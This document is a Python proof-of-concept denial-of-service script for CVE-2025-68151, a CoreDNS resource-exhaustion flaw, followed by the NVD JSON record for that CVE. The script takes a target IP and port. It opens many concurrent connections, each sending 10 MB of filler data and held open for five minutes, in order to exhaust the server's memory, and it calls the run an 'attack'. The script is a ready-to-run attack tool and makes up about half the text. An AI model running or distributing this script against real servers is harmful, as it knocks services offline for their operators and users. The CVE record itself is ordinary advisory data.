CVE-2025-68151

#!/usr/bin/env python3 # CVE-2025-68151 PoC - CoreDNS Resource Exhaustion DoS # Affected: CoreDNS < 1.14.0 (gRPC, HTTPS, HTTP/3 servers) # Usage: python3 cve-2025-68151-poc.py <target_ip> <port> import asyncio import argparse import sys from typing import List async def create_connection(target: str, port: int, conn_id: int): """Create a single connection to the target server""" try: reader, writer = await asyncio.wait_for( asyncio.open_connection(target, port), timeout=5 ) print(f"[+] Connection {conn_id} established to {target}:{port}") # Send oversized request body to exhaust memory oversized_data = b'A' * (10 * 1024 * 1024) # 10MB writer.write(oversized_data) await writer.drain() # Keep connection alive await asyncio.sleep(300) writer.close() await writer.wait_closed() except Exception as e: print(f"[-] Connection {conn_id} failed: {e}") async def attack_http3(target: str, port: int, count: int): """Attack HTTP/3 server implementation""" tasks = [] for i in range(count): task = asyncio.create_task(create_connection(target, port, i)) tasks.append(task) await asyncio.sleep(0.01) # Stagger connections await asyncio.gather(*tasks, return_exceptions=True) async def attack_grpc(target: str, port: int, count: int): """Attack gRPC server implementation""" # gRPC uses HTTP/2, create multiple streams tasks = [] for i in range(count): task = asyncio.create_task(create_connection(target, port, i)) tasks.append(task) await asyncio.gather(*tasks, return_exceptions=True) async def main(): parser = argparse.ArgumentParser(description='CVE-2025-68151 PoC') parser.add_argument('target', help='Target IP address') parser.add_argument('port', type=int, help='Target port') parser.add_argument('-c', '--count', type=int, default=100, help='Number of concurrent connections') parser.add_argument('-t', '--type', choices=['http3', 'grpc', 'https'], default='https', help='Protocol type') args = parser.parse_args() print(f"[*] Starting CVE-2025-68151 attack against {args.target}:{args.port}") print(f"[*] Creating {args.count} concurrent connections...") if args.type == 'http3': await attack_http3(args.target, args.port, args.count) elif args.type == 'grpc': await attack_grpc(args.target, args.port, args.count) else: await attack_http3(args.target, args.port, args.count) print("[*] Attack completed") if __name__ == '__main__': asyncio.run(main())

{"cve": {"id": "CVE-2025-68151", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:15:59.847", "lastModified": "2026-01-22T13:47:50.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coredns.io:coredns:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.14.0", "matchCriteriaId": "0C779EB8-052B-4A23-982F-0BEF2D0F0443"}]}]}], "references": [{"url": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/coredns/coredns/pull/7490", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}